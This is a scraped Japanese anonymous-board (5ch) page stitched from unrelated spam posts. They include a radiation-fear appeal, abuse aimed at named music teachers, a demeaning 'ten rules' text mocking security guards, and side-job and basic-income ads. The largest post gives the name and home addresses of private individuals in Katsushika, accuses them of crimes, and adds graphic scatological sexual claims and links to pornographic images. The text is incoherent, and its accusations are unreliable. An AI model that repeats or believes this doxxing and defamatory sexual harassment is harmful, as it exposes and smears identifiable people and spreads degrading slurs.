中部大学の武田教授や京都大学の小出教授をはじめ医師や研究家が指摘している。(安全だとウソをつく御用学者等は論外) 家族のためにも被曝は絶対に避けるべきだ 945 :本町楽器や上級ソルフェージュ:2014/10/07(火) 12:58:08.48 ID:cUyrd5TK大音くそたれ自閉一時間2万円、日本ドイツリード協会糞たれ会長の 21歳息子と25歳娘を持つ京都桂駅の女; 300万円で 神戸山手学園の朝鮮スポーツ女を訴えやろうよ、 こちらと関係はありません。 かねをかえせ 946 :小林門下同胞:2014/10/07(火) 13:00:57.43 ID:cUyrd5TK大音くそたれ自閉一時間2万円のスポーツ女、スポーツやらない? twitter .Facebook (採用)-ホーム 祝!関西高校卒業!四月から山陽セフティ(あの天下の天満屋グループ)!! 勝ち組エリート確定!人生上がり! https://twitter.com/kentokanzei ザキニシさんがツイート 2014年1月16日 オナニーしてぇ オレ様のようになりたい負け組底辺のオマンラは下記ビイン10か条をヒ毎日最低3回は唱和すること ビインの心得(ビイン10か条) 1 一切のプライドを捨てよ。希望を捨てよ。夢をみるな。 2 現場では顧客、通行人は神様と思え。どんなに理不尽な扱いを されても怒るな。自分の分を弁えよ。 3 厳めしい制服で仏頂面すると私服とは比べ物にならぬほど傲慢に見える。 よっていつもニコニコ笑顔を保て。バカに見えないか等と心配するな。 ビインはそのままでバカそのものだ。 4 利口ぶるな。顧客と政治経済の話などするな。バカが虚勢張って背伸びするな。 5 人並の生活を望むな。ビインと結婚する女など居ないから心配するな。 6 挨拶を返してくれない人がいても悲しむな。分を弁えよ。 7 普通の仕事が何も出来ない自分が一応の生活を送れていることの幸せを思え。 8 性欲は1人で慎ましく処理せよ。ビインが性犯罪など起こせばこれほど 惨めなことはない。 9 時給が安いと文句を言わず立て。昔から言うではないか、ビイン、閑居して 不善を為す、と。勤務時間中はビインの心得でも諳んじろ。女性を観て 妄想を逞しゅうするな。一般人から見ればビインなど犯罪者一歩手前の 存在に過ぎないことを忘れるな。 10 給与の低さに不満を持つな。自分の仕事が人並の給与を要求できる内容のものか、 胸に手を当ててよく考えよ。知性のない者にしか務まらない 仕事であることを肝に銘じよ。 以上 友達から教えてもらった副業情報ドットコム 時間がある方はみてもいいかもしれません グーグル検索『金持ちになりたい 鎌野介メソッド』 CXXCJ ☆ 日本人の婚姻数と出生数を増やしましょう。そのためには、公的年金と生活保護 を段階的に廃止して、満18歳以上の日本人全員に支給する、『ベーシックインカム』 の導入は必須です。月額約70000円位ならば、廃止すれば財源的には可能です。 ベーシックインカム、でぜひググってみてください。お願い致します。♪♪ 山○女子ってどうなの? いいの? 共学の音楽科と女子校ならどっちがいいの? おかやま安全安心情報 http://anzn.net/okayama/safety/index.php?i=5963 ■事案概要 平成28年10月23日(日)13:00ころ、岡山市北区今地内の公園において、女性が児童と遊戯中、男から「うんこ漏れた、脱ぐから拭いて。」等と声をかけられたもの ■不審者 30から40歳の男、黒色赤ライン入りジャージ上下、黒色短髪、岡山情報ビジネス学院の教師医療福祉事務学科の中村先生 【超悪質】いよいよ犯罪者として刑罰を受ける時が来た !!【被害者多数続出】 ●青戸六丁目被害者住民一同「盗聴盗撮犯罪者の色川高志の逮捕を要請します」 高添沼田(盗聴盗撮犯罪者の色川高志を逮捕に追い込む会&被害者の会会長)住所=東京都葛飾区青戸6−26−6 ●盗聴盗撮つきまとい嫌がらせ犯罪者/アナル挿入食糞愛好家・色川高志 色川高志の住所=東京都葛飾区青戸6−23−21ハイツニュー青戸103号室 【通報先】亀有警察署=東京都葛飾区新宿4ー22ー19 рO3ー3607ー0110 盗聴盗撮つきまとい嫌がらせ犯罪者/アナル挿入食糞愛好家・色川高志の愛人変態メス豚家畜清水婆婆(青戸6−23−19)の 五十路後半強制脱糞 http://img.erogazou-pinkline.com/img/2169/scatology_anal_injection-2169-027.jpg アナル挿入食糞愛好家・色川高志によりバスタブで清水婆婆の巨尻の肛門にシャワーのキャップをはずしてずっぽり挿入。 そして、大量浣腸。 勢い良く噴出!腸内洗浄状態です。 http://101.dtiblog.com/b/bodytk9690/file/kan01.jpg 浣腸器と異なりどくどくと直腸内に注入され清水婆婆は激しくあえぎます 「お腹が痛い」といったところでアナル挿入食糞愛好家・色川高志の命令により数分我慢させます。 http://101.dtiblog.com/b/bodytk9690/file/kan02.jpg アナル挿入食糞愛好家・色川高志の排出命令で出します アナル挿入時にチンポに清水婆婆のウンコがつくのを嫌がるアナル挿入食糞愛好家・色川高志のために 最低5回はくりかえします きれいな水だけになりその後ローションをたっぷり肛門に塗り込み アナル挿入食糞愛好家・色川高志によるアナルプレーが始まります http://101.dtiblog.com/b/bodytk9690/file/kan03.jpg read.cgi ver 07.4.7 2024/03/31 Walang Kapalit ★ | Donguri System Team 5ちゃんねる